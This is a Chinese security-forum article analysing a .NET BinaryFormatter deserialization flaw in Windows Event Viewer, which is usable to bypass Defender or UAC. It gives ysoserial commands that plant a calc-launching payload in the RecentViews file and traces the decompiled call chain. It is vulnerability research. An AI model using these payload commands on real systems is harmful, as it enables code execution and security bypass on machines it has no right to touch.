问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
干货 | 最新Windows事件查看器.NET反序列化漏洞分析
漏洞分析
# 0x01 漏洞背景 4月26日@Orange Tsai 在Twitter上发表一个有关Windows事件查看器的反序列化漏洞,可以用来绕过Windows Defender或者ByPass UAC等其它攻击场景,Orange视频里也给出了攻击载...
0x01 漏洞背景 ========= 4月26日@Orange Tsai 在Twitter上发表一个有关Windows事件查看器的反序列化漏洞,可以用来绕过Windows Defender或者ByPass UAC等其它攻击场景,Orange视频里也给出了攻击载荷 DataSet > ysoserial.exe -o raw -f BinaryFormatter -g DataSet -c calc > %LOCALAPPDATA%\\Microsoft\\Eventv~1\\RecentViews  0x02 漏洞复现 ========= @Orange Tsai 给出的ysoserial DataSet载荷用到的是BinaryFormatter反序列化,有关.NET反序列化漏洞参考:[这个系列文章](https://mp.weixin.qq.com/s/9_YaDdOOPZCYfb3NOIlg6A),因为笔者使用DataSet载荷复现未成功,所以替换用TypeConfuseDelegate作为攻击载荷,%LOCALAPPDATA% 等同于 C:\\Users\\用户名\\AppData\\Local 目录,Eventv~1 代表目录名前6个字符 Eventv开头的第1个目录,其实可指定为本地的 Event Viewer文件夹,文件名一定得是固定的RecentViews,至于为什么可以看后续的原理分析,ysoserial 生成攻击载荷命令如下,有个小小的建议:可以先打开一次事件查看器,便于操作系统创建EventViewer目录,否则执行ysoserial命令会抛出 "系统找不到路径"错误 > ysoserial.exe -o raw -f BinaryFormatter -g TypeConfuseDelegate -c calc > %LOCALAPPDATA%\\Microsoft\\Eventv~1\\RecentViews 打开Windows事件查看器或者输入如下所示的命令行均可触发漏洞 > cmd/c eventvwr.msc > cmd/c eventvwr.exe  0x03 调用链分析 ========== 打开事件查看器Windows系统会启动mmc.exe去关联eventvwr.msc,进中mmc.exe右击 ”属性“ -> .NET程序集 如下图所示  反编译EventViewer.dll,笔者从EventViewer事件查看器核心代码入手,至于它继承的父类FormView及基类View不再跟进,EventViewerHomePage类是主入口,实现基类View里的虚方法OnInitialize,  接着对EventHomeControl类做了初始化, UpdateUIDelegate(this.UpdateUI) 表示 EventHomeControl 读取数据并加载数据到可视化UI界面 ```php public EventHomeControl() { this.InitializeComponent(); UIControlProcessing.SetControlSystemFont(this); UIControlProcessing.SetControlTitleFont(this.eventViewerLabel, this.Font); this.updateUI = new EventHomeControl.UpdateUIDelegate(this.UpdateUI); this.enableControl = new EventHomeControl.EnableControlDelegate(this.EnableControl); } ``` this.UpdateUI方法对可视化操作选项做了多重判断,有更新事件列表、有更新日志摘要、有更新事件列表当前对应的进程信息、还有我们重点关注的case 1 更新最近访问浏览的信息,进入UpdateRecentViewsUI 条件分支  UpdateRecentViewsUI方法调用了UpdateRecentViewsListViewUI,并且将属性 RecentViewsDataArrayList的值传递给此方法,如下图  RecentViewsDataArrayList属于EventsNode类的成员,数据来源自LoadDataForRecentView执行后的结果,这里是将EventsNode.recentViewsDataArrayList的值赋给了RecentViewsDataArrayList属性,代码如下 ```php internal ArrayList RecentViewsDataArrayList { get { this.LoadDataForRecentViews(); return EventsNode.recentViewsDataArrayList; } } ``` LoadDataForRecentView方法再调用LoadMostRecentViewsDataFromFile,  读取 EventsNode.recentViewsFile 流后用 Deserialize(fileStream) 去反序列化,再将集合赋给 recentViewsDataArrayList,这样正常情况RecentViewsDataArrayList就获取到了最近浏览的数据。代码如下 ```php private void LoadMostRecentViewsDataFromFile() { try { if (!string.IsNullOrEmpty(EventsNode.recentViewsFile) && File.Exists(EventsNode.recentViewsFile)) { FileStream fileStream = new FileStream(EventsNode.recentViewsFile, FileMode.Open); object syncRoot = EventsNode.recentViewsDataArrayList.SyncRoot; lock (syncRoot) { EventsNode.recentViewsDataArrayList = (ArrayList)new BinaryFormatter().Deserialize(fileStream); } fileStream.Close(); } }catch (FileNotFoundException){} } ``` 再来细看下EventsNode.recentViewsFile,整个定义在EventsNode类构造方法里分了3步,笔者个人觉得判断逻辑有些罗里吧嗦的  第1步 --- Environment.SpecialFolder.CommonApplicationData 在Windows系统里表示 "C:\\Users\\用户名\\AppData\\Roaming",StandardStringValues类自定义多个静态变量,如MicrosoftFolderName代表"Microsoft", LIN\_EventViewer 代表 " Event Viewer "; 第2步 --- 用 CommonApplicationData 替代 LocalApplicationData,LocalApplicationData代表 " C:\\Users\\用户名\\AppData\\Local "; 第3步 --- 将前两步和“RecentViews”串起来,最终得到 recentViewsFile = ”C:\\Users\\用户名\\AppData\\Local\\Microsoft\\Event Viewer\\RecentViews“,所以笔者在上小节复现的时候提到RecentViews文件名是固定的不能改。  如上图 ysoserial 生成攻击载荷写入到 \\Microsoft\\Event Viewer\\RecentViews,打开事件查看器即可触发漏洞。 0x04 结语 ======= 最后回顾总结下漏洞的主体调用链 > View -> FormView -> EventViewerHomePage -> EventHomeControl -> UpdateUIDelegate(委托) -> UpdateUI -> UpdateRecentViewsUI -> UpdateRecentViewsListViewUI -> RecentViewsDataArrayList -> LoadDataForRecentView -> LoadMostRecentViewsDataFromFile -> BinaryFormatter().Deserialize 关于.NET反序列化漏洞可以在GitHub上找到相关解读[文章](https://github.com/Ivan1ee/NET-Deserialize)参考学习或关注公众号[dotNet安全矩阵](https://mp.weixin.qq.com/s/A7Z720lavhNSjlNNc3nzng)
发表于 2022-05-06 10:47:03
阅读 ( 5324 )
分类:
漏洞分析
0 推荐
收藏
0 条评论
请先
登录
后评论
Ivan1ee
13 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!